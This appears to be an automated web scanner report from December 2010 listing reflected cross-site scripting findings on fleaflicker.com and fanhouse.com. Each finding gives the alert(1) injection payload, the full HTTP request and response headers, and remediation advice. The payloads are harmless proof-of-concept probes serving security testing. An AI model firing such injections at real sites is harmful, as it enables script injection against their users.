GET /2010/12/16/jeff-hardy-lashes-out-against-reports-he-was-unfit-to-wrestle/?1b56d"-alert(1)-"af7479a8180=1 HTTP/1.1 Host: www.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1ad1'%3balert(1)//d9eff0dc659 was submitted in the REST URL parameter 1. This input was echoed as a1ad1';alert(1)//d9eff0dc659 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_uaca1ad1'%3balert(1)//d9eff0dc659/adpage.html HTTP/1.1 Host: www.fleaflicker.com Proxy-Connection: keep-alive Referer: http://www.fleaflicker.com/nfl/news Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_pers=%20s_getnr%3D1292523990132-New%7C1355595990132%3B%20s_nrgvo%3DNew%7C1355595990135%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; timeZoneOffset=300
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:28:41 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 ntCoent-Length: 4767 Content-Length: 4767
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1deec'%3balert(1)//b12fa031508 was submitted in the REST URL parameter 1. This input was echoed as 1deec';alert(1)//b12fa031508 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /about1deec'%3balert(1)//b12fa031508 HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:27:58 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4750 Keep-Alive: timeout=5, max=60 Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98e32'%3balert(1)//739a115d201 was submitted in the REST URL parameter 1. This input was echoed as 98e32';alert(1)//739a115d201 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /celeb98e32'%3balert(1)//739a115d201/most-added-dropped HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:28:16 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4769 Keep-Alive: timeout=5, max=5 Connection: Keep-Alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3591'%3balert(1)//02d4378a20f was submitted in the REST URL parameter 2. This input was echoed as d3591';alert(1)//02d4378a20f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /celeb/most-added-droppedd3591'%3balert(1)//02d4378a20f HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:28:17 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4810 Keep-Alive: timeout=5, max=20 Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cdd2a'%3balert(1)//a805c30c62b was submitted in the REST URL parameter 1. This input was echoed as cdd2a';alert(1)//a805c30c62b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /celebcdd2a'%3balert(1)//a805c30c62b/news HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:28:11 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4755 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4841'%3balert(1)//fab326e2cad was submitted in the REST URL parameter 2. This input was echoed as f4841';alert(1)//fab326e2cad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /celeb/newsf4841'%3balert(1)//fab326e2cad HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:28:11 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4796 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49150'%3balert(1)//95a2948c48c was submitted in the REST URL parameter 1. This input was echoed as 49150';alert(1)//95a2948c48c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /contact49150'%3balert(1)//95a2948c48c HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:27:46 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4752 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c887b'%3balert(1)//a1abe3adb68 was submitted in the REST URL parameter 1. This input was echoed as c887b';alert(1)//a1abe3adb68 in the application's response.
Request
GET /copyrightc887b'%3balert(1)//a1abe3adb68 HTTP/1.1
Host: www.fleaflicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:28:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 4754
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf14b'%3balert(1)//37315752510 was submitted in the REST URL parameter 1. This input was echoed as cf14b';alert(1)//37315752510 in the application's response.
Request
GET /forumscf14b'%3balert(1)//37315752510 HTTP/1.1
Host: www.fleaflicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:27:44 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 4751
Keep-Alive: timeout=5, max=54
Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b6c3'%3balert(1)//2f41834a1e4 was submitted in the REST URL parameter 1. This input was echoed as 4b6c3';alert(1)//2f41834a1e4 in the application's response.
Request
GET /help4b6c3'%3balert(1)//2f41834a1e4 HTTP/1.1
Host: www.fleaflicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:27:43 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 4749
Keep-Alive: timeout=5, max=52
Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d585e'%3balert(1)//c78635bdeb7 was submitted in the REST URL parameter 1. This input was echoed as d585e';alert(1)//c78635bdeb7 in the application's response.
Request
GET /iphoned585e'%3balert(1)//c78635bdeb7 HTTP/1.1
Host: www.fleaflicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:27:51 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 4751
Keep-Alive: timeout=5, max=83
Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46c5d'%3balert(1)//acc3ebce0bb was submitted in the REST URL parameter 1. This input was echoed as 46c5d';alert(1)//acc3ebce0bb in the application's response.
Request
GET /jobs46c5d'%3balert(1)//acc3ebce0bb HTTP/1.1
Host: www.fleaflicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:27:56 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 4749
Keep-Alive: timeout=5, max=68
Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17cf9'%3balert(1)//6b24ea74037 was submitted in the REST URL parameter 1. This input was echoed as 17cf9';alert(1)//6b24ea74037 in the application's response.
Request
GET /mlb17cf9'%3balert(1)//6b24ea74037/most-added-dropped HTTP/1.1
Host: www.fleaflicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:28:06 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 4767
Keep-Alive: timeout=5, max=37
Connection: Keep-Alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e467'%3balert(1)//2a9f54d1b14 was submitted in the REST URL parameter 2. This input was echoed as 5e467';alert(1)//2a9f54d1b14 in the application's response.
Request
GET /mlb/most-added-dropped5e467'%3balert(1)//2a9f54d1b14 HTTP/1.1
Host: www.fleaflicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:28:06 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 4783
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa51a'%3balert(1)//fd4c0aad613 was submitted in the REST URL parameter 1. This input was echoed as fa51a';alert(1)//fd4c0aad613 in the application's response.
Request
GET /mlbfa51a'%3balert(1)//fd4c0aad613/news HTTP/1.1
Host: www.fleaflicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:27:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 4753
Keep-Alive: timeout=5, max=43
Connection: Keep-Alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2becc'%3balert(1)//52ca4059d96 was submitted in the REST URL parameter 2. This input was echoed as 2becc';alert(1)//52ca4059d96 in the application's response.
Request
GET /mlb/news2becc'%3balert(1)//52ca4059d96 HTTP/1.1
Host: www.fleaflicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:27:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 4769
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7e3f'%3balert(1)//808cf0ed815 was submitted in the REST URL parameter 1. This input was echoed as c7e3f';alert(1)//808cf0ed815 in the application's response.
Request
GET /must-signinc7e3f'%3balert(1)//808cf0ed815 HTTP/1.1
Host: www.fleaflicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:27:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 4756
Keep-Alive: timeout=5, max=35
Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 148cd'%3balert(1)//4cd99bb2be was submitted in the REST URL parameter 1. This input was echoed as 148cd';alert(1)//4cd99bb2be in the application's response.
Request
GET /nba148cd'%3balert(1)//4cd99bb2be/most-added-dropped HTTP/1.1
Host: www.fleaflicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:28:06 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 4766
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aaab2'%3balert(1)//a9ea4e2d320 was submitted in the REST URL parameter 2. This input was echoed as aaab2';alert(1)//a9ea4e2d320 in the application's response.
Request
GET /nba/most-added-droppedaaab2'%3balert(1)//a9ea4e2d320 HTTP/1.1
Host: www.fleaflicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:28:07 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 4824
Keep-Alive: timeout=5, max=46
Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a65ea'%3balert(1)//621b24d0ff5 was submitted in the REST URL parameter 1. This input was echoed as a65ea';alert(1)//621b24d0ff5 in the application's response.
Request
GET /nbaa65ea'%3balert(1)//621b24d0ff5/news HTTP/1.1
Host: www.fleaflicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:28:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 4753
Keep-Alive: timeout=5, max=13
Connection: Keep-Alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b741'%3balert(1)//2d7f1c89381 was submitted in the REST URL parameter 2. This input was echoed as 7b741';alert(1)//2d7f1c89381 in the application's response.
Request
GET /nba/news7b741'%3balert(1)//2d7f1c89381 HTTP/1.1
Host: www.fleaflicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:28:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 4810
Keep-Alive: timeout=5, max=44
Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35b81'%3balert(1)//cf6f6e25687 was submitted in the REST URL parameter 1. This input was echoed as 35b81';alert(1)//cf6f6e25687 in the application's response.
Request
GET /nfl35b81'%3balert(1)//cf6f6e25687/ HTTP/1.1
Host: www.fleaflicker.com
Proxy-Connection: keep-alive
Referer: http://www.fleaflicker.com/nfl/news
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523993474-New%7C1355595993474%3B%20s_nrgvo%3DNew%7C1355595993476%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Player%25252520News%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/%252526ot%25253DA%3B
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:28:37 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
ntCoent-Length: 4755
Content-Length: 4755
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cda34'%3balert(1)//b912e0d0d11 was submitted in the REST URL parameter 1. This input was echoed as cda34';alert(1)//b912e0d0d11 in the application's response.
Request
GET /nflcda34'%3balert(1)//b912e0d0d11/boxscore HTTP/1.1
Host: www.fleaflicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:27:35 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 4757
Keep-Alive: timeout=5, max=20
Connection: Keep-Alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5729'%3balert(1)//684c2e23c02 was submitted in the REST URL parameter 2. This input was echoed as a5729';alert(1)//684c2e23c02 in the application's response.
Request
GET /nfl/boxscorea5729'%3balert(1)//684c2e23c02 HTTP/1.1
Host: www.fleaflicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:27:37 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 4771
Keep-Alive: timeout=5, max=77
Connection: Keep-Alive
